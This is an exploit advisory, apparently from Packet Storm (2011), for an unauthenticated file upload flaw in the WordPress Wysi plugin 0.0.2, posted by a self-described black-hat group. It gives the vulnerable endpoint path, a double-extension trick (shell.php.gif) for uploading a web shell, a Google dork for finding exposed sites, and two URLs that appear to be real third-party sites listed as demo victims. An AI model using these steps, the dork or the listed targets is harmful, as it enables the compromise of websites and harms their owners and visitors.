WordPress Wysi 0.0.2 Shell Upload

2011-06-14T00:00:00
ID PACKETSTORM:102281
Type packetstorm
Reporter Net.Edit0r
Modified 2011-06-14T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Wysi Plugin Arbitrary File upload Vulnerability  
# Date: June, 14th 2011 [GMT +7]  
# Author: Net.Edit0r  
# Software Link: http://wordpress.org/extend/plugins/real-wysiwyg/  
# Version : 0.0.2  
# Tested on: ubuntu 11.04  
# CVE : -  
  
-----------------------------------------------------------------------------------------  
WordPress Wysi Plugin Arbitrary File upload Vulnerability => RFU Vulnerability  
-----------------------------------------------------------------------------------------  
  
Author : Net.Edit0r  
Date : June, 14th 2011 [GMT +7]  
Location : Iran  
Web : http://Black-Hg.Org  
Critical Lvl : Medium  
Where : From Remote  
My Group : Black Hat Group #BHG  
---------------------------------------------------------------------------  
  
  
Vulnerability:  
~~~~~~~~~~~~  
in this file you can upload image files without any authentication.  
  
for uploading shell you must change extension of file to  
.php.gif(shell.php.gif)  
  
or any other image extension.successful attack depend to host and  
server config.  
  
  
  
PoC/Exploit:  
~~~~~~~~~~  
  
~ [PoC] ~: /wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php  
  
~ [PoC] ~: Http://[victim]/path-to-wp/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php  
  
[ Upload To : /wp-content/content/shell.php.jpg ]  
  
Dork:  
~~~~~  
Google : inurl:"/filemanager/InsertFile/insert_file.php"  
  
  
Demo URL:  
~~~~~~~~~  
- http://www.kalamu.com/bol/wp-content/plugins/filemanager/InsertFile/insert_file.php  
  
- http://www.afofoundation.org/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php  
  
  
Timeline:  
~~~~~~~~~  
- 13 - 06 - 2011 bug found.  
- 13 - 06 - 2011 vendor contacted, but no response.  
- 14 - 06 - 2011 Advisories release.  
  
Contact:  
~~~~~~~~~  
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com  
  
---------------------------------------------------------------------------  
Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x | D3adlY |Cho0bin and  
all bhg member  
  
Spical Th4nks: B3hz4d | M4Hd1 | GeNeRaLL | Mikili And All My Friendz  
  
[!] Persian Gulf 4 Ever  
[!] I Love Iran And All Iranian People  
-------------------------------- [ EOF ] ----------------------------------  
`